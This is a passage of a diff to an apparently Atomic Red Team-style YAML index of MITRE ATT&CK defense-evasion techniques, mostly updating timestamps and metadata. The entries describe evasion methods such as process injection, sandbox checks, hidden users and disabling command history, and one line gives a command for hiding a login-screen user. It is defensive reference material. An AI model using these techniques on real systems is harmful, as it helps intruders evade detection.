           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -9987,8 +10103,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1647:
@@ -10039,7 +10153,7 @@ defense-evasion:
         pairs to insert environment variables, such as <code>LSEnvironment</code>,
         to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
         wardle chp2 persistence)(Citation: eset_osx_flashback)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T22:00:33.375Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Plist File Modification
       x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -10060,7 +10174,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1647
     atomic_tests: []
   T1553.005:
@@ -10127,7 +10240,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.005
     atomic_tests: []
   T1600.002:
@@ -10150,7 +10262,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:48.503Z'
       name: Disable Crypto Hardware
       description: |-
         Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -10171,8 +10283,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542:
     technique:
@@ -10233,11 +10343,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1612:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:22:09.807Z'
       name: Build Image on Host
       description: "Adversaries may build a container image directly on a host to
         bypass defenses that monitor for the retrieval of malicious images from a
@@ -10302,7 +10411,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1612
     atomic_tests: []
   T1055.002:
@@ -10326,7 +10434,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -10370,8 +10478,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1218.012:
@@ -10427,7 +10533,7 @@ defense-evasion:
         not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
         Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
         Nick Tyrer GitHub) "
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:35:28.221Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Verclsid
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -10451,7 +10557,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.010:
     technique:
@@ -10542,7 +10647,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.010
     atomic_tests:
     - name: ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI
@@ -10585,35 +10689,7 @@ defense-evasion:
         elevation_required: true
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -10625,6 +10701,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -10635,8 +10715,14 @@ defense-evasion:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -10646,9 +10732,28 @@ defense-evasion:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1218.005:
     technique:
@@ -10701,7 +10806,7 @@ defense-evasion:
       - source_name: LOLBAS Mshta
         url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
         description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T20:38:28.802Z'
       name: 'Signed Binary Proxy Execution: Mshta'
       description: "Adversaries may abuse mshta.exe to proxy execution of malicious
         .hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -10739,68 +10844,72 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.005
     atomic_tests: []
   T1480:
     technique:
+      modified: '2024-06-07T14:30:23.491Z'
+      name: Execution Guardrails
+      description: |-
+        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+        Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Nick Carr, Mandiant
+      x_mitre_deprecated: false
+      x_mitre_detection: Detecting the use of guardrails may be difficult depending
+        on the implementation. Monitoring for suspicious processes being spawned that
+        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+        especially in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Nick Carr, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      x_mitre_defense_bypassed:
+      - Anti-virus
+      - Host Forensic Analysis
+      - Signature-based Detection
+      - Static File Analysis
       type: attack-pattern
       id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
       created: '2019-01-31T02:10:08.261Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1480
         url: https://attack.mitre.org/techniques/T1480
+        external_id: T1480
       - source_name: FireEye Outlook Dec 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
         description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
           the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
           June 23, 2020.'
+        url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+      - source_name: Trellix-Qakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved June 7, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: FireEye Kevin Mandia Guardrails
-        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
         description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
           U.S. malware is more restrained than adversaries'. Retrieved January 17,
           2019.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
-        Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Execution Guardrails
-      x_mitre_detection: Detecting the use of guardrails may be difficult depending
-        on the implementation. Monitoring for suspicious processes being spawned that
-        gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
-        especially in a short period of time, may aid in detection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Command: Command Execution'
-      x_mitre_defense_bypassed:
-      - Anti-virus
-      - Host Forensic Analysis
-      - Signature-based Detection
-      - Static File Analysis
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.001:
     technique:
@@ -10858,7 +10967,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1205.001:
@@ -10884,7 +10992,7 @@ defense-evasion:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -10909,8 +11017,6 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.012:
     technique:
@@ -10971,7 +11077,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.002:
     technique:
@@ -11044,7 +11149,7 @@ defense-evasion:
         <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>).(Citation:
         Hide GDM User Accounts) Display Managers are not anchored to specific distributions
         and may be changed by a user or adversary."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T02:31:01.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Hide Artifacts: Hidden Users'
       x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -11073,7 +11178,6 @@ defense-evasion:
       - 'User Account: User Account Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.002
     atomic_tests: []
   T1134.003:
@@ -11137,11 +11241,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.940Z'
       name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
@@ -11226,7 +11329,6 @@ defense-evasion:
         url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1562.003
     atomic_tests:
     - name: Disable history collection
@@ -11433,7 +11535,7 @@ defense-evasion:
           '
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -11508,45 +11610,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -11570,6 +11637,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -11580,9 +11650,14 @@ defense-evasion:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -11592,8 +11667,35 @@ defense-evasion:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1134.004:
     technique:
@@ -11650,7 +11752,7 @@ defense-evasion:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -11675,7 +11777,6 @@ defense-evasion:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1055.014:
@@ -11746,7 +11847,7 @@ defense-evasion:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -11773,11 +11874,10 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -11831,7 +11931,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1574.013:
     technique:
@@ -11867,7 +11966,7 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -11893,8 +11992,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.004:
     technique:
@@ -11920,7 +12017,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -11942,8 +12039,6 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1218.001:
     technique:
@@ -12009,12 +12104,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.001
     atomic_tests: []
   T1070.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-13T17:15:56.948Z'
       name: 'Indicator Removal on Host: Network Share Connection Removal'
       description: 'Adversaries may remove share connections that are no longer useful
         in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -12069,7 +12163,6 @@ defense-evasion:
